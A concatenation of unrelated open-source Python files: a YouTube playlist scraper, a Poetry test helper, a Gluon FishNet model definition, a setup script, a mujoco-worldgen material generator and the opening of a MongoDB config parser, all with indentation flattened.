from playx.playlist.playlistbase import PlaylistBase, SongMetadataBase
from playx.stringutils import remove_punct
from playx.logger import Logger
# Setup logger
logger = Logger("YoutubePlaylist")
class YoutubeMetadata(SongMetadataBase):
def __init__(self, url="", title=""):
super().__init__(title, url, "")
self._create_search_query()
def _create_search_query(self):
"""
Create a search querry.
"""
self.search_query = self.URL
def display(self):
"""Be informative."""
logger.info("Title: {}".format(self.title))
class YoutubePlaylist(PlaylistBase):
"""
Class to store YouTube playlist data.
    This is where we try to parse the page results ourselves.
    Only works for the first 100 songs.
    If we want to fetch more, we have to make another AJAX request or simulate
    scrolling, which is another problem.
    Refer to `YoutubePlaylist2`.
"""
def __init__(self, URL, pl_start=None, pl_end=None):
"""Init the URl."""
super().__init__(pl_start, pl_end)
self.URL = URL
self.list_content_tuple = []
self.playlist_name = ""
self._DELETED = [
"deleted video",
"मेटाइएको भिडियो",
"private video",
]
def extract_name(self, name):
"""Extract the name of the playlist."""
name = str(name).replace("\n", "")
name = "".join(re.findall(r">.*?<", name)).replace(">", "").replace("<", "")
name = " ".join(re.findall(r"[^ ]+", name))
name = remove_punct(name)
self.playlist_name = name
def _is_connection_possible(self):
"""Make a simple request to check if connection is possible.
        i.e. check if the internet is connected.
"""
url = "https://google.com"
try:
requests.get(url)
except requests.exceptions.ConnectionError:
return False
return True
def _check_valid(self, url):
"""Check if the passed URL is valid."""
h = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux \
x86_64; rv:49.0) Gecko/20100101 Firefox/49.0"
}
s = BeautifulSoup(requests.get(url, headers=h).text, "lxml")
t = 'window["ytInitialData"] = '
i = next((i for i in s.find_all("script") if t in str(i)))
i = i.get_text().replace(t, "").replace("\n", "")
i = re.sub(r'^.*"playabilityStatus"', "", i)
i = i.split(",")
status = re.sub(r':|\{|"|status', "", i[0])
if status == "OK":
return True
else:
reason = next((r for r in i if '"reason"' in r))
reason = re.sub(r':|\{|"|reason|simpleText|}', "", reason)
logger.info("Skipping {}: {} {}".format(url, status, reason))
return False
def extract_playlistdata(self):
"""Extract all the videos into YoutubeMetadata objects."""
url_prepend = "https://www.youtube.com/watch?v="
url_base = "https://www.youtube.com"
if not self._is_connection_possible():
logger.warning("Cannot play playlist. No connection detected!")
return "N/A", []
r = requests.get(self.URL)
soup = BeautifulSoup(r.text, "html.parser")
name = soup.findAll("h1", attrs={"class": "pl-header-title"})
self.extract_name(name)
# soup = soup.findAll('tr', attrs={'class': 'pl-video',
# 'class': 'yt-uix-tile'})
logger.debug(len(soup))
# use regex to get video url
# this seems rigid against <div> changes
# so, far this works
links = soup.find_all(
"a", href=re.compile(r".*watch.*") # this regex can be improved in future
)
for link in links:
href = link["href"]
title = link.contents[0]
# If the link is not a video from playlist, there will be no
# 'index' substring. Hence, we can skip this
if "index" not in href:
continue
# Just to make sure the title is not empty. This is done because
# there is always a first link that contains 'index', yet does not
# have a title. This represents the meta-link: a link to playlist
# itself.
title = title.strip()
if not title:
continue
# Get video url using simple algorithm. This 3 index search is done
# just to make sure when youtube playlist url has these query
# params in shuffled order.
slicer = self._get_url_slicer(href)
url = url_base + href[:slicer]
# Check if the video is deleted. Some videos in playlist turn out
# to be deleted videos. We can put a check for that by checking
# if the title is [Deleted video]
# We have a simpler way to check for deleted videos
if title.lower()[1:-1] in self._DELETED:
logger.debug(title.lower()[1:-1])
logger.info("Skipping {}: DELETED/BLOCKED/PRIVATE video.".format(url))
continue
if not self._check_valid(url):
continue
self.list_content_tuple.append(YoutubeMetadata(url, title))
if len(self.list_content_tuple) == 0:
logger.warning(
"Are you sure you have videos in your playlist? Try changing\
privacy to public."
)
self.strip_to_start_end()
def _get_url_slicer(self, url):
slicers = []
strings = ["&index=", "&t=", "&list="]
for s in strings:
try:
slicer = url.index(s)
slicers.append(slicer)
except ValueError:
continue
return min(slicers)
class YoutubePlaylist2(YoutubePlaylist):
"""
Class to store YouTube playlist data.
    This uses the `youtube-dl --flat-playlist` command to fetch everything.
    This is more robust since we don't have to parse anything manually.
    It also solves the AJAX/scrolling issue when a playlist has more than
    100 songs.
"""
def extract_playlistdata(self):
url_prepend = "https://www.youtube.com/watch?v="
url_base = "https://www.youtube.com"
if not self._is_connection_possible():
logger.warning("Cannot play playlist. No connection detected!")
return "N/A", []
# first get playlist name
logger.info(f"Fetching playlist name for [{self.URL}]")
r = requests.get(self.URL)
soup = BeautifulSoup(r.text, "html.parser")
name = soup.findAll("h1", attrs={"class": "pl-header-title"})
self.extract_name(name)
logger.info(f"Playlist name = [{self.playlist_name}]")
logger.info("Fetching songs...")
cmd = f"youtube-dl -j --flat-playlist {self.URL}"
output, errors = exe(cmd)
if not output and errors:
logger.error("Unable to extract playlist")
return "N/A", []
videos = list(map(json.loads, output.split("\n")))
logger.info(f"Found {len(videos)} songs")
for i, video in enumerate(videos):
title = video["title"].strip()
url = video["url"]
url = url_prepend + url
if title.lower()[1:-1] in self._DELETED:
logger.debug(title.lower()[1:-1])
logger.info(f"Skipping [{url}] Possibly DELETED/BLOCKED/PRIVATE video.")
continue
logger.info(f"Checking if [{title}] [{url}] is available")
if not self._check_valid(url):
logger.info("Skipping...")
continue
self.list_content_tuple.append(YoutubeMetadata(url, title))
if len(self.list_content_tuple) == 0:
logger.warning(
"Are you sure you have videos in your playlist? Try changing\
privacy to public."
)
self.strip_to_start_end()
def get_data(URL, pl_start, pl_end):
"""Generic function. Should be called only when
it is checked if the URL is a youtube playlist.
Returns a tuple containing the songs and name of
the playlist.
"""
logger.debug("Extracting Playlist Content")
youtube_playlist = YoutubePlaylist2(URL, pl_start, pl_end)
youtube_playlist.extract_playlistdata()
return youtube_playlist.list_content_tuple, youtube_playlist.playlist_name
def main():
url = "https://www.youtube.com/playlist?list=PLwg22VSCR0W6cwuCKUJSkX72xEvYXS0Zx"
print(url)
yp = YoutubePlaylist2(url)
yp.extract_playlistdata()
if __name__ == "__main__":
main()
|
tests/console/commands/self/utils.py | zEdS15B3GCwq/poetry | 7,258 | 12657689 | from __future__ import annotations
from pathlib import Path
from typing import TYPE_CHECKING
from poetry.factory import Factory
if TYPE_CHECKING:
from tomlkit.container import Table as TOMLTable
def get_self_command_dependencies(locked: bool = True) -> TOMLTable:
from poetry.console.commands.self.self_command import SelfCommand
from poetry.locations import CONFIG_DIR
system_pyproject_file = SelfCommand.get_default_system_pyproject_file()
assert system_pyproject_file.exists()
assert system_pyproject_file.parent == Path(CONFIG_DIR)
if locked:
assert system_pyproject_file.parent.joinpath("poetry.lock").exists()
poetry = Factory().create_poetry(system_pyproject_file.parent, disable_plugins=True)
content = poetry.file.read()["tool"]["poetry"]
assert "group" in content
assert SelfCommand.ADDITIONAL_PACKAGE_GROUP in content["group"]
assert "dependencies" in content["group"][SelfCommand.ADDITIONAL_PACKAGE_GROUP]
return content["group"][SelfCommand.ADDITIONAL_PACKAGE_GROUP]["dependencies"]
|
gluon/gluoncv2/models/fishnet.py | naviocean/imgclsmob | 2,649 | 12657701 | """
FishNet for ImageNet-1K, implemented in Gluon.
Original paper: 'FishNet: A Versatile Backbone for Image, Region, and Pixel Level Prediction,'
http://papers.nips.cc/paper/7356-fishnet-a-versatile-backbone-for-image-region-and-pixel-level-prediction.pdf.
"""
__all__ = ['FishNet', 'fishnet99', 'fishnet150', 'ChannelSqueeze']
import os
from mxnet import cpu
from mxnet.gluon import nn, HybridBlock
from mxnet.gluon.contrib.nn import Identity
from .common import pre_conv1x1_block, pre_conv3x3_block, conv1x1, SesquialteralHourglass, InterpolationBlock
from .preresnet import PreResActivation
from .senet import SEInitBlock
def channel_squeeze(x,
channels_per_group):
"""
Channel squeeze operation.
Parameters:
----------
x : NDArray
Input tensor.
channels_per_group : int
Number of channels per group.
Returns:
-------
NDArray
Resulted tensor.
"""
return x.reshape((0, -4, channels_per_group, -1, -2)).sum(axis=2)
class ChannelSqueeze(HybridBlock):
"""
Channel squeeze layer. This is a wrapper over the same operation. It is designed to save the number of groups.
Parameters:
----------
channels : int
Number of channels.
groups : int
Number of groups.
"""
def __init__(self,
channels,
groups,
**kwargs):
super(ChannelSqueeze, self).__init__(**kwargs)
assert (channels % groups == 0)
self.channels_per_group = channels // groups
def hybrid_forward(self, F, x):
return channel_squeeze(x, self.channels_per_group)
class PreSEAttBlock(HybridBlock):
"""
FishNet specific Squeeze-and-Excitation attention block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
reduction : int, default 16
Squeeze reduction value.
"""
def __init__(self,
in_channels,
out_channels,
bn_use_global_stats,
reduction=16,
**kwargs):
super(PreSEAttBlock, self).__init__(**kwargs)
mid_cannels = out_channels // reduction
with self.name_scope():
self.bn = nn.BatchNorm(
in_channels=in_channels,
use_global_stats=bn_use_global_stats)
self.relu = nn.Activation("relu")
self.conv1 = conv1x1(
in_channels=in_channels,
out_channels=mid_cannels,
use_bias=True)
self.conv2 = conv1x1(
in_channels=mid_cannels,
out_channels=out_channels,
use_bias=True)
self.sigmoid = nn.Activation("sigmoid")
def hybrid_forward(self, F, x):
x = self.bn(x)
x = self.relu(x)
x = F.contrib.AdaptiveAvgPooling2D(x, output_size=1)
x = self.conv1(x)
x = self.relu(x)
x = self.conv2(x)
x = self.sigmoid(x)
return x
class FishBottleneck(HybridBlock):
"""
FishNet bottleneck block for residual unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int
Strides of the convolution.
dilation : int or tuple/list of 2 int
Dilation value for convolution layer.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""
def __init__(self,
in_channels,
out_channels,
strides,
dilation,
bn_use_global_stats,
**kwargs):
super(FishBottleneck, self).__init__(**kwargs)
mid_channels = out_channels // 4
with self.name_scope():
self.conv1 = pre_conv1x1_block(
in_channels=in_channels,
out_channels=mid_channels,
bn_use_global_stats=bn_use_global_stats)
self.conv2 = pre_conv3x3_block(
in_channels=mid_channels,
out_channels=mid_channels,
strides=strides,
padding=dilation,
dilation=dilation,
bn_use_global_stats=bn_use_global_stats)
self.conv3 = pre_conv1x1_block(
in_channels=mid_channels,
out_channels=out_channels,
bn_use_global_stats=bn_use_global_stats)
def hybrid_forward(self, F, x):
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
return x
class FishBlock(HybridBlock):
"""
FishNet block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int, default 1
Strides of the convolution.
dilation : int or tuple/list of 2 int, default 1
Dilation value for convolution layer.
bn_use_global_stats : bool, default False
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
squeeze : bool, default False
Whether to use a channel squeeze operation.
"""
def __init__(self,
in_channels,
out_channels,
strides=1,
dilation=1,
bn_use_global_stats=False,
squeeze=False,
**kwargs):
super(FishBlock, self).__init__(**kwargs)
self.squeeze = squeeze
self.resize_identity = (in_channels != out_channels) or (strides != 1)
with self.name_scope():
self.body = FishBottleneck(
in_channels=in_channels,
out_channels=out_channels,
strides=strides,
dilation=dilation,
bn_use_global_stats=bn_use_global_stats)
if self.squeeze:
assert (in_channels // 2 == out_channels)
self.c_squeeze = ChannelSqueeze(
channels=in_channels,
groups=2)
elif self.resize_identity:
self.identity_conv = pre_conv1x1_block(
in_channels=in_channels,
out_channels=out_channels,
strides=strides,
bn_use_global_stats=bn_use_global_stats)
def hybrid_forward(self, F, x):
if self.squeeze:
identity = self.c_squeeze(x)
elif self.resize_identity:
identity = self.identity_conv(x)
else:
identity = x
x = self.body(x)
x = x + identity
return x
class DownUnit(HybridBlock):
"""
FishNet down unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of int
Number of output channels for each block.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""
def __init__(self,
in_channels,
out_channels_list,
bn_use_global_stats,
**kwargs):
super(DownUnit, self).__init__(**kwargs)
with self.name_scope():
self.blocks = nn.HybridSequential(prefix="")
for i, out_channels in enumerate(out_channels_list):
self.blocks.add(FishBlock(
in_channels=in_channels,
out_channels=out_channels,
bn_use_global_stats=bn_use_global_stats))
in_channels = out_channels
self.pool = nn.MaxPool2D(
pool_size=2,
strides=2)
def hybrid_forward(self, F, x):
x = self.blocks(x)
x = self.pool(x)
return x
class UpUnit(HybridBlock):
"""
FishNet up unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of int
Number of output channels for each block.
dilation : int or tuple/list of 2 int, default 1
Dilation value for convolution layer.
bn_use_global_stats : bool, default False
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""
def __init__(self,
in_channels,
out_channels_list,
dilation=1,
bn_use_global_stats=False,
**kwargs):
super(UpUnit, self).__init__(**kwargs)
with self.name_scope():
self.blocks = nn.HybridSequential(prefix="")
for i, out_channels in enumerate(out_channels_list):
squeeze = (dilation > 1) and (i == 0)
self.blocks.add(FishBlock(
in_channels=in_channels,
out_channels=out_channels,
dilation=dilation,
bn_use_global_stats=bn_use_global_stats,
squeeze=squeeze))
in_channels = out_channels
self.upsample = InterpolationBlock(scale_factor=2, bilinear=False)
def hybrid_forward(self, F, x):
x = self.blocks(x)
x = self.upsample(x)
return x
class SkipUnit(HybridBlock):
"""
FishNet skip connection unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of int
Number of output channels for each block.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""
def __init__(self,
in_channels,
out_channels_list,
bn_use_global_stats,
**kwargs):
super(SkipUnit, self).__init__(**kwargs)
with self.name_scope():
self.blocks = nn.HybridSequential(prefix="")
for i, out_channels in enumerate(out_channels_list):
self.blocks.add(FishBlock(
in_channels=in_channels,
out_channels=out_channels,
bn_use_global_stats=bn_use_global_stats))
in_channels = out_channels
def hybrid_forward(self, F, x):
x = self.blocks(x)
return x
class SkipAttUnit(HybridBlock):
"""
FishNet skip connection unit with attention block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of int
Number of output channels for each block.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""
def __init__(self,
in_channels,
out_channels_list,
bn_use_global_stats,
**kwargs):
super(SkipAttUnit, self).__init__(**kwargs)
mid_channels1 = in_channels // 2
mid_channels2 = 2 * in_channels
with self.name_scope():
self.conv1 = pre_conv1x1_block(
in_channels=in_channels,
out_channels=mid_channels1,
bn_use_global_stats=bn_use_global_stats)
self.conv2 = pre_conv1x1_block(
in_channels=mid_channels1,
out_channels=mid_channels2,
use_bias=True,
bn_use_global_stats=bn_use_global_stats)
in_channels = mid_channels2
self.se = PreSEAttBlock(
in_channels=mid_channels2,
out_channels=out_channels_list[-1],
bn_use_global_stats=bn_use_global_stats)
self.blocks = nn.HybridSequential(prefix="")
for i, out_channels in enumerate(out_channels_list):
self.blocks.add(FishBlock(
in_channels=in_channels,
out_channels=out_channels,
bn_use_global_stats=bn_use_global_stats))
in_channels = out_channels
def hybrid_forward(self, F, x):
x = self.conv1(x)
x = self.conv2(x)
w = self.se(x)
x = self.blocks(x)
x = F.broadcast_add(F.broadcast_mul(x, w), w)
return x
class FishFinalBlock(HybridBlock):
"""
FishNet final block.
Parameters:
----------
in_channels : int
Number of input channels.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""
def __init__(self,
in_channels,
bn_use_global_stats,
**kwargs):
super(FishFinalBlock, self).__init__(**kwargs)
mid_channels = in_channels // 2
with self.name_scope():
self.conv1 = pre_conv1x1_block(
in_channels=in_channels,
out_channels=mid_channels,
bn_use_global_stats=bn_use_global_stats)
self.preactiv = PreResActivation(
in_channels=mid_channels,
bn_use_global_stats=bn_use_global_stats)
def hybrid_forward(self, F, x):
x = self.conv1(x)
x = self.preactiv(x)
return x
class FishNet(HybridBlock):
"""
FishNet model from 'FishNet: A Versatile Backbone for Image, Region, and Pixel Level Prediction,'
http://papers.nips.cc/paper/7356-fishnet-a-versatile-backbone-for-image-region-and-pixel-level-prediction.pdf.
Parameters:
----------
direct_channels : list of list of list of int
Number of output channels for each unit along the straight path.
skip_channels : list of list of list of int
Number of output channels for each skip connection unit.
init_block_channels : int
Number of output channels for the initial unit.
bn_use_global_stats : bool, default False
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
Useful for fine-tuning.
in_channels : int, default 3
Number of input channels.
in_size : tuple of two ints, default (224, 224)
Spatial size of the expected input image.
classes : int, default 1000
Number of classification classes.
"""
def __init__(self,
direct_channels,
skip_channels,
init_block_channels,
bn_use_global_stats=False,
in_channels=3,
in_size=(224, 224),
classes=1000,
**kwargs):
super(FishNet, self).__init__(**kwargs)
self.in_size = in_size
self.classes = classes
depth = len(direct_channels[0])
down1_channels = direct_channels[0]
up_channels = direct_channels[1]
down2_channels = direct_channels[2]
skip1_channels = skip_channels[0]
skip2_channels = skip_channels[1]
with self.name_scope():
self.features = nn.HybridSequential(prefix="")
self.features.add(SEInitBlock(
in_channels=in_channels,
out_channels=init_block_channels,
bn_use_global_stats=bn_use_global_stats))
in_channels = init_block_channels
down1_seq = nn.HybridSequential(prefix="")
skip1_seq = nn.HybridSequential(prefix="")
for i in range(depth + 1):
skip1_channels_list = skip1_channels[i]
if i < depth:
skip1_seq.add(SkipUnit(
in_channels=in_channels,
out_channels_list=skip1_channels_list,
bn_use_global_stats=bn_use_global_stats))
down1_channels_list = down1_channels[i]
down1_seq.add(DownUnit(
in_channels=in_channels,
out_channels_list=down1_channels_list,
bn_use_global_stats=bn_use_global_stats))
in_channels = down1_channels_list[-1]
else:
skip1_seq.add(SkipAttUnit(
in_channels=in_channels,
out_channels_list=skip1_channels_list,
bn_use_global_stats=bn_use_global_stats))
in_channels = skip1_channels_list[-1]
up_seq = nn.HybridSequential(prefix="")
skip2_seq = nn.HybridSequential(prefix="")
for i in range(depth + 1):
skip2_channels_list = skip2_channels[i]
if i > 0:
in_channels += skip1_channels[depth - i][-1]
if i < depth:
skip2_seq.add(SkipUnit(
in_channels=in_channels,
out_channels_list=skip2_channels_list,
bn_use_global_stats=bn_use_global_stats))
up_channels_list = up_channels[i]
dilation = 2 ** i
up_seq.add(UpUnit(
in_channels=in_channels,
out_channels_list=up_channels_list,
dilation=dilation,
bn_use_global_stats=bn_use_global_stats))
in_channels = up_channels_list[-1]
else:
skip2_seq.add(Identity())
down2_seq = nn.HybridSequential(prefix="")
for i in range(depth):
down2_channels_list = down2_channels[i]
down2_seq.add(DownUnit(
in_channels=in_channels,
out_channels_list=down2_channels_list,
bn_use_global_stats=bn_use_global_stats))
in_channels = down2_channels_list[-1] + skip2_channels[depth - 1 - i][-1]
self.features.add(SesquialteralHourglass(
down1_seq=down1_seq,
skip1_seq=skip1_seq,
up_seq=up_seq,
skip2_seq=skip2_seq,
down2_seq=down2_seq))
self.features.add(FishFinalBlock(
in_channels=in_channels,
bn_use_global_stats=bn_use_global_stats))
in_channels = in_channels // 2
self.features.add(nn.AvgPool2D(
pool_size=7,
strides=1))
self.output = nn.HybridSequential(prefix="")
self.output.add(conv1x1(
in_channels=in_channels,
out_channels=classes,
use_bias=True))
self.output.add(nn.Flatten())
def hybrid_forward(self, F, x):
x = self.features(x)
x = self.output(x)
return x
def get_fishnet(blocks,
model_name=None,
pretrained=False,
ctx=cpu(),
root=os.path.join("~", ".mxnet", "models"),
**kwargs):
"""
Create FishNet model with specific parameters.
Parameters:
----------
blocks : int
Number of blocks.
model_name : str or None, default None
Model name for loading pretrained model.
pretrained : bool, default False
Whether to load the pretrained weights for model.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
"""
if blocks == 99:
direct_layers = [[2, 2, 6], [1, 1, 1], [1, 2, 2]]
skip_layers = [[1, 1, 1, 2], [4, 1, 1, 0]]
elif blocks == 150:
direct_layers = [[2, 4, 8], [2, 2, 2], [2, 2, 4]]
skip_layers = [[2, 2, 2, 4], [4, 2, 2, 0]]
else:
raise ValueError("Unsupported FishNet with number of blocks: {}".format(blocks))
direct_channels_per_layers = [[128, 256, 512], [512, 384, 256], [320, 832, 1600]]
skip_channels_per_layers = [[64, 128, 256, 512], [512, 768, 512, 0]]
direct_channels = [[[b] * c for (b, c) in zip(*a)] for a in
([(ci, li) for (ci, li) in zip(direct_channels_per_layers, direct_layers)])]
skip_channels = [[[b] * c for (b, c) in zip(*a)] for a in
([(ci, li) for (ci, li) in zip(skip_channels_per_layers, skip_layers)])]
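    # e.g. for blocks=99 the first entry of direct_channels expands to
    # [[128, 128], [256, 256], [512, 512, 512, 512, 512, 512]], i.e. each stage
    # repeats its per-layer channel count "layer count" times.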
init_block_channels = 64
net = FishNet(
direct_channels=direct_channels,
skip_channels=skip_channels,
init_block_channels=init_block_channels,
**kwargs)
if pretrained:
if (model_name is None) or (not model_name):
raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.")
from .model_store import get_model_file
net.load_parameters(
filename=get_model_file(
model_name=model_name,
local_model_store_dir_path=root),
ctx=ctx)
return net
def fishnet99(**kwargs):
"""
FishNet-99 model from 'FishNet: A Versatile Backbone for Image, Region, and Pixel Level Prediction,'
http://papers.nips.cc/paper/7356-fishnet-a-versatile-backbone-for-image-region-and-pixel-level-prediction.pdf.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
"""
return get_fishnet(blocks=99, model_name="fishnet99", **kwargs)
def fishnet150(**kwargs):
"""
FishNet-150 model from 'FishNet: A Versatile Backbone for Image, Region, and Pixel Level Prediction,'
http://papers.nips.cc/paper/7356-fishnet-a-versatile-backbone-for-image-region-and-pixel-level-prediction.pdf.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
"""
return get_fishnet(blocks=150, model_name="fishnet150", **kwargs)
def _test():
import numpy as np
import mxnet as mx
pretrained = False
models = [
fishnet99,
fishnet150,
]
for model in models:
net = model(pretrained=pretrained)
ctx = mx.cpu()
if not pretrained:
net.initialize(ctx=ctx)
# net.hybridize()
net_params = net.collect_params()
weight_count = 0
for param in net_params.values():
if (param.shape is None) or (not param._differentiable):
continue
weight_count += np.prod(param.shape)
print("m={}, {}".format(model.__name__, weight_count))
assert (model != fishnet99 or weight_count == 16628904)
assert (model != fishnet150 or weight_count == 24959400)
x = mx.nd.zeros((1, 3, 224, 224), ctx=ctx)
y = net(x)
assert (y.shape == (1, 1000))
if __name__ == "__main__":
_test()
|
learning/setup.py | dibakch/differential-privacy | 2,550 | 12657704 | <reponame>dibakch/differential-privacy<gh_stars>1000+
# Copyright 2021 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Setup for DP Learning package."""
import os
import setuptools
here = os.path.dirname(os.path.abspath(__file__))
def _parse_requirements(path):
"""Parses requirements from file."""
with open(os.path.join(here, path)) as f:
return [line.rstrip() for line in f] + ["dp-accounting"]
setuptools.setup(
name="dp-learning",
author="Google Differential Privacy Team",
author_email="<EMAIL>",
description="Differential privacy learning algorithms",
long_description_content_type="text/markdown",
url="https://github.com/google/differential-privacy/",
packages=setuptools.find_packages(),
install_requires=_parse_requirements("requirements.txt"),
classifiers=[
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Software Development :: Libraries :: Python Modules",
],
python_requires=">=3.7",
license="Apache 2.0",
keywords="differential-privacy clustering",
)
|
envs/hns/mujoco-worldgen/mujoco_worldgen/objs/material.py | jiayu-ch15/curriculum | 424 | 12657755 | import numpy as np
import hashlib
from collections import OrderedDict
from mujoco_worldgen.objs.obj import Obj
from mujoco_worldgen.util.types import store_args
class Material(Obj):
placeable = False
@store_args
def __init__(self,
random=True,
rgba=None,
texture=None,
texture_type=None,
grid_layout=None,
grid_size=None):
super(Material, self).__init__()
def generate(self, random_state, world_params, placement_size=None):
if not world_params.randomize_material:
deterministic_seed = int(hashlib.sha1(
self.name.encode()).hexdigest(), 16)
random_state = np.random.RandomState(deterministic_seed % 100000)
choice = random_state.randint(0, 3)
self.xml_dict = None
if self.texture is not None:
self.xml_dict = self._material_texture(
random_state, self.texture, self.texture_type,
self.grid_layout, self.grid_size, self.rgba)
elif self.rgba is not None:
self.xml_dict = self._material_rgba(random_state, self.rgba)
elif self.xml_dict is None:
self.xml_dict = [self._material_rgba,
self._material_checker,
self._material_random][choice](random_state)
self.xml_dict = OrderedDict(asset=self.xml_dict)
def generate_xml_dict(self):
return self.xml_dict
def _material_rgba(self, random_state, rgba=None):
material_attrs = OrderedDict([('@name', self.name),
('@specular', 0.1 + 0.2 *
random_state.uniform()),
('@shininess', 0.1 + 0.2 *
random_state.uniform()),
('@reflectance', 0.1 + 0.2 * random_state.uniform())])
if rgba is None:
material_attrs['@rgba'] = 0.1 + 0.8 * random_state.uniform(size=4)
material_attrs['@rgba'][3] = 1.0
elif isinstance(rgba, tuple) and len(rgba) == 2:
material_attrs['@rgba'] = random_state.uniform(rgba[0], rgba[1])
else:
material_attrs['@rgba'] = rgba
return OrderedDict(material=[material_attrs])
def _material_checker(self, random_state):
texture_attr = OrderedDict([('@name', "texture_" + self.name),
('@builtin', 'checker'),
('@height', random_state.randint(5, 100)),
('@width', random_state.randint(5, 100)),
('@type', '2d'),
('@rgb1', [0, 0, 0])])
texture_attr['@rgb2'] = 0.1 + 0.8 * random_state.uniform(size=3)
xml_dict = OrderedDict(texture=[texture_attr])
texrepeat = [random_state.randint(
5, 100), random_state.randint(5, 100)]
xml_dict["material"] = [OrderedDict([('@name', self.name),
('@texrepeat', texrepeat),
('@texture', "texture_" + self.name)])]
return xml_dict
def _material_random(self, random_state):
random = 0.1 + 0.8 * random_state.uniform()
texture_attr = OrderedDict([('@name', "texture_" + self.name),
('@builtin', 'flat'),
('@mark', 'random'),
('@type', '2d'),
('@height', 2048),
('@width', 2048),
('@rgb1', [1, 1, 1]),
('@rgb2', [1, 1, 1]),
('@random', random)])
material = OrderedDict([('@name', self.name),
('@texture', "texture_" + self.name)])
xml_dict = OrderedDict([('texture', [texture_attr]),
('material', [material])])
return xml_dict
def _material_texture(self, random_state, texture, texture_type=None,
grid_layout=None, grid_size=None, rgba=None):
texture_attr = OrderedDict([
('@name', "texture_" + self.name),
('@type', '2d'),
('@builtin', 'none'),
('@file', texture),
])
if texture_type is None:
texture_type = "cube"
texture_attr["@type"] = texture_type
if texture_type == "cube":
texture_attr["@gridlayout"] = '.U..LFRB.D..' if grid_layout is None else grid_layout
texture_attr["@gridsize"] = '3 4' if grid_size is None else grid_size
material = OrderedDict([
('@name', self.name),
('@texture', "texture_" + self.name),
])
if rgba is not None:
material['@rgba'] = rgba
return OrderedDict([
('texture', [texture_attr]),
('material', [material]),
])
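# Usage sketch (the texture file name is hypothetical, for illustration only):
# Material() with no arguments picks one of the rgba / checker / random-texture
# variants at generate() time; Material(texture="wood.png", texture_type="cube")
# builds a cube-mapped texture with the default '.U..LFRB.D..' grid layout; a
# fixed rgba list can also be passed through unchanged.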
|
insights/parsers/mongod_conf.py | maxamillion/insights-core | 121 | 12657771 | """
MongodbConf - files - Configuration files for MongoDB
=====================================================
This module contains the following files:
``/etc/mongod.conf``,
``/etc/mongodb.conf`` ,
``/etc/opt/rh/rh-mongodb26/mongod.conf``
``/etc/opt/rh/rh-mongodb34/mongod.conf``
They are provided by package mongodb-server, rh-mongodb26-mongodb-server or
rh-mongodb34-mongodb-server.
These MongoDB configuration files may use the **YAML** format
or the standard **key-value pair** format.
Sample input(YAML format)::
systemLog:
destination: file
logAppend: true
path: /var/log/mongodb/mongod.log
# Where and how to store data.
storage:
dbPath: /var/lib/mongo
journal:
enabled: true
Sample input(key-value pair format)::
# mongodb.conf - generated from Puppet
#where to log
logpath=/var/log/mongodb/mongodb.log
logappend=true
# Set this option to configure the mongod or mongos process to bind to and
# listen for connections from applications on this address.
# You may concatenate a list of comma separated values to bind mongod to multiple IP addresses.
bind_ip = 127.0.0.1
# fork and run in background
fork=true
dbpath=/var/lib/mongodb
# location of pidfile
pidfilepath=/var/run/mongodb/mongodb.pid
# Enables journaling
journal = true
# Turn on/off security. Off is currently the default
noauth=true
Examples:
    >>> mongod_conf1 = shared[MongodbConf]
    >>> mongod_conf2 = shared[MongodbConf]
    >>> mongod_conf1.is_yaml
    True
    >>> mongod_conf2.is_yaml
    False
    >>> mongod_conf1.fork
    True
    >>> mongod_conf2.fork
    'true'
    >>> mongod_conf1.dbpath
    '/var/lib/mongo'
    >>> mongod_conf2.dbpath
    '/var/lib/mongodb'
    >>> mongod_conf1.get("systemLog", {}).get("logAppend")
    True
    >>> mongod_conf2.get("logappend")
    'true'
"""
import yaml
from .. import parser, Parser, LegacyItemAccess, get_active_lines
from ..parsers import ParseException, split_kv_pairs
from ..specs import Specs
@parser(Specs.mongod_conf)
class MongodbConf(Parser, LegacyItemAccess):
"""
Parse the ``/etc/mongod.conf`` config file in key-value pair or YAML format.
    Expose several frequently used config options as properties.
Raises:
ParseException: Raised when any problem parsing the file content.
Attributes:
is_yaml (boolean): True if this is a yaml format file.
"""
def parse_content(self, content):
a_content = get_active_lines(content)
